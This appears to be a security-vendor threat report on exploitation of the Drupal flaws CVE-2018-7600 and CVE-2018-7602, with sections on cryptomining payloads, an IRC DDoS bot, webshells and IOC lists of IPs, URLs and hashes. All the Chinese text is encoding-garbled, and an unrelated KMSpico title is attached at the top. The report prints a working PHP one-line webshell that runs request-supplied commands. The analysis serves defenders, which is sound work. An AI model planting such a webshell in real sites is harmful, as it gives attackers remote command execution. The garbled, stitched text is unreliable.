KMSpico¼¤»î¹¤¾ßľÂíÆÊÎö
2017-09-30
DrupalÔ¶³Ì´úÂëÖ´ÐÐÎó²îÍþÐ²Ì¬ÊÆÆÊÎö
Ò»¡¢¸ÅÊö
Drupal¹Ù·½ÔÚ2018Äê3ÔÂ28ÈÕÐû²¼sa-core-2018-002 (CVE-2018-7600) DrupalÄÚºËÔ¶³Ì´úÂëÖ´ÐÐÎó²îÔ¤¾¯£¬Ö®ºóÒ»¸öÔÂÄÚÓÖÒ»Á¬Ðû²¼Á½¸öÎó²î£¬ÆäÖаüÀ¨Ò»¸öXSSºÍÁíÒ»¸ö¸ßΣ´úÂëÖ´ÐÐÎó²îsa-core-2018-004 (CVE-2018-7602)£¬ÒÔºóÁ½¸öÔÂÄÚ»¥ÁªÍøÉÏÕë¶ÔDrupal³ÌÐòµÄ¹¥»÷ºÜÊÇÆµÈÔ£¬AG¹«Ë¾¿Æ¼¼ÍþвÇ鱨ÖÐÐÄ£¨NTI£©ÍŽáÇå¾²Ç鱨Êý¾Ý£¬´ÓÎó²îÅû¶µ½Ê¹ÓóÌÐòµÄÈö²¥£¬×ܽáÁËÍâ½çÕë¶ÔDrupal³ÌÐòµÄ³£¼û¹¥»÷ÊÖ·¨£¬¶ÔÏà¹ØÌ¬ÊÆ¾ÙÐÐÁËÊáÀí£¬Ï£Íû¿ÉÒÔΪÇå¾²´ÓÒµÖ°Ô±Ìṩ½¨æÅºÍ²Î¿¼¡£
¶þ¡¢Îó²îÅû¶ʱ¼äÖá

ËäÈ»Îó²îÒѾÅû¶£¬Ïà¹ØÊ¹ÓõÄPoCÈ´ÔÚÁ½Öܺó²Å·Å³ö£¬¶ø½ö½öÔÚPoCÅû¶ºó¼¸¸öСʱ£¬¾Í·¢Ã÷ÓÐʹÓôËÎó²îµÄ¹¥»÷·ºÆð¡£ÔÚËæºóµÄʱ¼äÄÚ»¥ÁªÍøÉÏÕë¶ÔDrupal³ÌÐòµÄ¹¥»÷ѸËÙÔöÌí£¬ÔÚ4ÔÂ29ÈÕµÖ´ï·åÖµ£¬²¢ÇÒÕë¶Ô¸ÃÎó²îµÄ¹¥»÷»¹ÔÚÒ»Á¬¡£

ÔÚPoCÐû²¼µÄʱ¼äÖáÉÏ£¬É¨Ãè¹¥»÷ÖÐ7.x°æ±¾µÄÎó²î´¥·¢uri·ºÆðƵÂÊÖð½¥¶àÓÚ8.x°æ±¾£¬ÄÜ¿´³ö¹¥»÷ÕßµÄ×¢ÖØÁ¦Öð½¥´Ó8.x°æ±¾×ªÒƵ½7.x°æ±¾¡£

ÏÂͼͳ¼ÆÁËÒÑÍùÁ½¸öÔ¼乥»÷ipÔÚÈ«ÇòµÄÂþÑÜÇéÐΣ¬Ö÷Òª¼¯ÖÐÔÚ±±ÃÀÖÞ¡¢Å·ÖÞÒÔ¼°ÄÏÃÀÖÞµÈÇøÓò£¬ÔÚ¹ú¼Ò²ãÃæÉÏÔòÊÇÒÔÄ«Î÷¸ç¡¢¶ò¹Ï¶à¶û¡¢¶íÂÞ˹ºÍÃÀ¹úΪÖ÷Òª¹¥»÷Ô´¡£


ÎÒÃǹØ×¢ÁËÌᳫ¹¥»÷×îÆµÈԵöip£¬·¢Ã÷ÆäÖв¿·Öipͬʱ¼ÓÈë¶àÖÖÀàÐÍÎó²î¹¥»÷£¬ºÃ±ÈWeblogic·´ÐòÁл¯Îó²î(CVE-2017-10271)£¬ Struts2-s2045Îó²î(CVE-2017-5638)µÈ£¬³ý´ËÖ®ÍâÒ²ÓÐÏ൱ÊýÄ¿µÄip»á¶ÔÄÚÍø¾ÙÐкáÏòÀ©Õ¹ÊµÏÖÈä³æÊ½Èö²¥£¬ÎÒÃÇÅжϴËÀàipÊôÓÚ½©Ê¬ÍøÂçµÄÒ»²¿·Ö¡£
Èý¡¢¹¥»÷ÓëʹÓÃ
ƾ֤ÎÒÃÇµÄ¼à¿Ø£¬Îó²îÐû²¼ºó²»¾Ã£¬ÍøÂçÖÐѸËÙ·ºÆðÁËÈýÀà²î±ðÐÎʽµÄ¹¥»÷·½·¨£º
- ÍÚ¿óʹÓ᣹¥»÷ÕßʹÓÃÎó²îÔÚÖ÷»úÖÐÖ²ÈëÊý×ÖÇ®±ÒµÄÍÚ¿ó³ÌÐò£¬Ê¹ÓÃÖ÷»ú×ÊÔ´¾ÙÐÐÍÚ¿óÔËËã¡£ÍÚ¿ó³ÌÐòÖ÷ÒªÕë¶ÔÃÅÂÞ±Ò£¬²¢ÇÒͬʱ±£´æWindowsºÍLinuxÁ½¸ö°æ±¾£»
- Ô¶¿ØÊ¹Ó᣸ÃʹÓþßÓÐÏÂÁîÖ´ÐС¢ÏÂÔØÔ¶³ÌÎļþ¡¢tcp/udp flood¹¥»÷µÈ¹¦Ð§£»
- WebshellÖ²Èë¡£ÎÒÃDz¶»ñµÄWebshell°üÀ¨Ò»¾ä»°Ä¾Âí£¬Ð¡ÂíºÍ¹¦Ð§Ç¿Ê¢µÄ´óÂí£»
ÔÚÕâÈýÀ๥»÷·½·¨ÖУ¬ÍÚ¿óʹÓõÄÊÖ·¨½ÏÁ¿³£¼û£¬¶øÏà¹Ø¹¥»÷Ö¸ÁîºÍ¿ó³ØµØµãÒ²ÔÚÆäËûRCEÎó²îÖзºÆð¹ý£¬¿ÉÒÔÅжϺڲúÍÅ»ïÒ²ÔÚÇ×½ü¹Ø×¢´ËÀà¸ßΣÎó²î¡£ÎÒÃÇͳ¼ÆÁËÕâÈýÀàÔÚËùÓй¥»÷ÖеÄÕ¼±È£¬ÆäÖÐÏòÊܺ¦ÕßÖ÷»úÖ²ÈëÍÚ¿ó¾ç±¾µÄÕ¼µ½95%£¬Ö²ÈëÔ¶¿ØÀàÑù±¾Õ¼3%£¬Ö²ÈëÍøÕ¾ºóÃŵÄÕ¼1%£¬ÉÐÓÐÉÙ²¿·Ö²¿·ÖÊÇÔÚÄ¿µÄÍøÕ¾¹ÒÉϺÚÒ³¡£

ÍÚ¿óÀà
ÔÚÔ¶³Ì´úÂëÖ´ÐÐÎó²î±»Åû¶ºó£¬ºÚ²ú×éÖ¯ÏòÎó²îÖ÷»úÖ²ÈëÍÚ¿ó³ÌÐò£¬Ê¹ÓÃϵͳ×ÊÔ´¾ÙÐÐÍÚ¿óIJÀû£¬ÕâÀ๥»÷ÍùÍù×ßÔÚ×îÇ°Ãæ£¬²¢ÇÒºÚ²ú×é֯ͨ³£»áͬʱ·¢ËÍ»ùÓÚLinuxϵͳºÍWindowsϵͳµÄ¹¥»÷ÔØºÉ£¬¶Ô²î±ðƽ̨µÖ´ïÏàͬµÄ¹¥»÷Ä¿µÄ¡£
- Windowsƽ̨
ÔÚWindowsϹ¥»÷Õß»áͨ¹ýpowershellдÈëvbs¾ç±¾²¢Å²ÓÃwscriptÏÂÔØ¶ñÒâ³ÌÐò£¬»òÕßÖ±½Óͨ¹ýpowershellÏÂÔØ£¬Ñù±¾ÔËÐкó»áÊͷųöÉèÖÃÎļþ£¬²¢ÐÞ¸Ä×¢²á±íʵÏÖ×ÔÎÒ±£»¤

ÕâÌõÏÂÁîÊÇ´Ó188.166.148.89ÏÂÔØ5_DRUPAL²¢Í¨¹ýpowershellÖ´ÐÐ

2.Linuxƽ̨
ÔÚlinuxƽ̨ÏµĹ¥»÷ÔØºÉÔòÊǶàÖÖ¶àÑù£¬ÀýÈç»ìÏý±àÂ룬αװ³Éjpg»òÕßpdfÎļþµÈ£¬¹¥»÷Õß»áÊÊÅäx86ƽ̨»òx64ƽ̨£¬ÔÚÊܺ¦ÕßÖ÷»úÏÂÔØÏìÓ¦µÄÍÚ¿ó³ÌÐò£¬Í¬Ê±Ð´ÈëÍýÏëʹÃü¼á³Ö³¤ÆÚÐÔ£¬×îÖÕÄ¿µÄʹÓÃϵͳ×ÊÔ´»ñÈ¡Êý×ÖÇ®±Ò¡£
ÀýÈç
wgetÏÂÔØshell¾ç±¾

payload¾Óɰ˽øÖƱàÂë
ÕâЩÑù±¾µÄÐÐΪ¶¼ÊÇ»ñÈ¡ÃÅÂÞ±Ò£¬¶øÔÚÕû¸öÎó²îʹÓÃÀú³ÌÖУ¬ÃÅÂÞ±Ò×éÖ¯ÅжÏÓÐЩǮ°üµØµãÓë½©Ê¬ÍøÂçÓйأ¬·âÍ£Á˲¿·ÖÇ®°üµØµã¡£

Õâʱ´úÎÒÃÇ·¢Ã÷ÁËÊ×ÀýʹÓÃCVE-2018-7600Îó²îÈä³æÊ½Èö²¥µÄ½©Ê¬ÍøÂçMuhstik£¬²¢ÇÒ²¶»ñÁ˶à¸ö»îÔ¾Ñù±¾£¬AG¹«Ë¾ÍþвÇ鱨ÖÐÐÄ£¨NTI£©ÆÊÎö³ö¸Ã¼Ò×åÑù±¾ºÍC&CÖ®¼äµÄ¹ØÏµ¡£




NTIչʾMuhstik¼Ò×å¹ØÏµ
Ô¶¿ØÀà
ÔÚÎó²î±¬·¢Ê±´ú£¬ÎÒÃǼà²âµ½Ê¹ÓøÃÎó²îÈö²¥µÄ»ùÓÚIRCÐÒéµÄDDoS¹¥»÷Ô¶¿Ø¾ç±¾£¬¾ç±¾Ê¹ÓÃperlÓïÑÔ±àд£¬×¢ÊÍÖзºÆðÁËÆÏÌÑÑÀÓïºÍÎ÷°àÑÀÓÎÒÃÇÆÊÎöÁ˾籾µÄ¹¦Ð§Ä£¿é£¬·¢Ã÷һ̨C&CÖ÷»ú104.160.176.178£¬¸Ã¾ç±¾»áƾָ֤Áî¾ÙÐÐÏÂÁîÖ´ÐС¢ÏÂÔØÔ¶³ÌÎļþ¡¢tcp/udp floodµÈ¹¥»÷

һЩָÁ
WebshellÀà
³ýÁËÔÚÊܺ¦ÕßÖ÷»úÖ²ÈëÍÚ¿ó³ÌÐòºÍÔ¶¿Ø³ÌÐòÍ⣬Զ³ÌÏÂÔØwebshellÖ²ÈëÍøÕ¾µÄÒ²²»ÔÚÉÙÊý£¬¶ø¹¥»÷ÊÂÎñÅú×¢Ô½À´Ô½¶àµÄ¹¥»÷Õßϲ»¶Ê¹ÓÃÔÚÏßÎļþ/ÎÄÌìÖ°ÏíÆ½Ì¨´æ·Åwebshell»òbash¾ç±¾£¬Òþ²ØÕæÕýµÄÖ÷»ú£¬µÖ´ïÒþÄä×Ù¼£µÄÄ¿µÄ¡£
ÎÒÃDz¶»ñÁ˼¸ÀàwebshellÈçÏ£¬°üÀ¨Ò»¾ä»°Ä¾Âí£¬Ð¡ÂíºÍ¹¦Ð§Ç¿Ê¢µÄ´óÂí¡£
Ò»¾ä»°Ä¾Âí£º
if(isset($_REQUEST['c'])) {system( $_REQUEST['c'].'2>&1');}
ÎÒÃÇͳ¼ÆÁ½ÖÜÄÚ·¢Ë͸ÃÒ»¾ä»°Ä¾ÂíµÄ¹¥»÷ip¼°·ºÆð´ÎÊýÈçÏ£º
|
IP |
·ºÆð´ÎÊý |
|
51.15.135.96 |
29 |
|
58.215.144.205 |
23 |
|
207.148.125.97 |
21 |
|
82.102.20.177 |
15 |
|
59.124.153.166 |
12 |
|
185.244.25.138 |
8 |
|
89.163.190.57 |
5 |
|
82.102.20.230 |
4 |
|
46.243.189.110 |
4 |
|
185.232.65.221 |
4 |
|
138.197.175.247 |
4 |
|
207.246.71.229 |
3 |
|
93.158.215.168 |
2 |
|
82.102.20.171 |
2 |
|
46.243.189.109 |
2 |
webshell/СÂí

webshell/´óÂí

ËÄ¡¢×ܽáÓ뽨Òé
¶Ô´Ë´ÎDrupalÄÚºËÔ¶³Ì´úÂëÖ´ÐÐÎó²îÊÂÎñµÄ¸ú×ÙÊÓ²ìÖУ¬ÎÒÃÇ·¢Ã÷
- ´ÓÎó²îʹÓÃϸ½ÚÐû²¼µ½ÓÐÓù¥»÷·ºÆð£¬Ê±¼ä´°¿ÚºÜÊǶÌÔÝ£¬Áô¸ø·ÀÓùÕßµÄʱ¼ä¼«ÆäÓÐÏÞ¡£´Ë´ÎÊÂÎñÖУ¬Õâ¸öʱ¼ä´°¿ÚÉõÖÁÒѾËõ¶Ìµ½Ð¡Ê±¼¶£»
- ºÚ¿ÍÆÕ±é×·Çó¹¥ÏÝÖ÷»úµÄÊýÄ¿¡£ºÚ¿ÍÔÚÎó²îÐû²¼ºó¶Ìʱ¼äÄÚ£¬Ñ¸ËÙ¿ª·¢Ïà¹ØÊ¹Óù¤¾ß£¬Í¨¹ý×Ô¶¯»¯µÄɨÃèÓëʹÓã¬ÔÚ»¥ÁªÍøÉÏÆÕ±éµØËѼ¯È±ÏÝÖ÷»ú£¬±£´æÎó²îµÄÍøÕ¾ÆÕ±é¶¼±£´æ×ű»¹¥ÏݵÄΣº¦¡£Òò´ËÖÎÀíÔ±ÐèÒª¶ÔÍøÕ¾·ºÆðµÄÎó²îÓÐ×ã¹»µÄÖØÊÓ£¬µÚһʱ¼ä¾ÙÐÐÉý¼¶ºÍÐÞ²¹£»
- ºÚ¿Í¾ßÓнÏÇ¿µÄ·´×·×ÙÄÜÁ¦¡£ºÚ¿ÍʹÓÃÔÚÏßÎļþ·ÖÏíÆ½Ì¨À´ÒþÄä×Ô¼ºµÄ×Ù¼££¬ÀýÈçpastebinµÈ£»
·À»¤½¨Ò飺
- ÍøÕ¾ÖÎÀíÔ±Ó¦Ò»Á¬¹Ø×¢ÍøÕ¾³ÌÐòÏà¹ØµÄÎó²îÇ鱨£¬ÊµÊ±¸üÐÂÍøÕ¾³ÌÐò£¬Éý¼¶·À»¤×°±¸¹æÔò£»
- ÖÎÀíÔ±Òª¹Ø×¢ÍøÕ¾Ö÷»úϵͳ×ÊԴʹÓÃÇéÐΣ¬¶Ìʱ¼äÄÚ×ÊԴʹÓÃÖèÔöÇҾӸ߲»Ï£¬ÐèÒª¹Ø×¢ÊÇ·ñ±»ÍÚ¿ó³ÌÐòÈëÇÖ£¬ÊµÊ±×öºÃ±¸·ÝºÍÕûÀí¶ñÒâÈí¼þ£»
Îå¡¢Ïà¹ØIOC
ÍøÂçͨѶ
142.44.240.14
145.239.93.215
188.166.148.89:444
217.182.231.56:443
195.22.127.225
104.160.176.178
Îļþ·þÎñÆ÷
http://94.41.167.11/
http://195.22.126.16/
http://188.166.148.89:53/
http://192.241.247.212/
http://93.174.93.149/
http://198.50.179.109:8020/
Ñù±¾¹þÏ£
|
Ñù±¾ |
±¸×¢ |
sha1 |
|
xm32.exe |
ÃÅÂÞ±ÒÍÚ¿ó |
cb00248b8bcd91e68c08a061a91cc3317db5724b |
|
Xm64.exe |
ÃÅÂÞ±ÒÍÚ¿ó |
8360f0d2df9008240f1d5e0f8acdbd2c98bad58c |
|
Xm32s |
ÃÅÂÞ±ÒÍÚ¿ó |
fcdd9c19b6b134dc31b3b688002eb51cac76a3ff |
|
xm64s |
ÃÅÂÞ±ÒÍÚ¿ó |
8822037953274ddd9f78b49ee73185be20e5e3ef |
|
1234567890.pdf |
ÃÅÂÞ±ÒÍÚ¿ó |
94c2ea3cf1cdb034df2e9aa5779fa0472396bff7 |
|
2sm.txt |
Ô¶¿Ø¾ç±¾ |
d7eb30269b3ba40ef59c0acef8948898fa54895f |
|
maxx2.txt |
Ô¶¿Ø¾ç±¾ |
68efd61193fc9b70394abb2327de2bf6b1f368b7 |
|
test.pl |
Ô¶¿Ø¾ç±¾ |
046a9c9838269fc5f76890b141bb39d22e6b9456 |
|
wow.txt |
Ô¶¿Ø¾ç±¾ |
c84dc265859d58827369eb25b752b6305b8306e7 |
|
K.txt |
php webshell |
7602c5cbc63e1bf2e484db63c94d5a22b7e17304 |
|
wso-encode.php |
php webshell |
e9e09b90cfdc1cd2ddb867385afa60816a7ee7d5 |
|
bash |
Muhstik¼Ò×å |
f92f1b03bcc45b692716789387d837905c8d4d76 |
|
shy |
Muhstik¼Ò×å |
0f4a3e0c6523fe0a0677f91182a1eabc536ff480 |
|
fbsd |
Muhstik¼Ò×å |
e6f914790b3888a46dff60f51a98c7191208685a |

AG¹«Ë¾ÔÆ







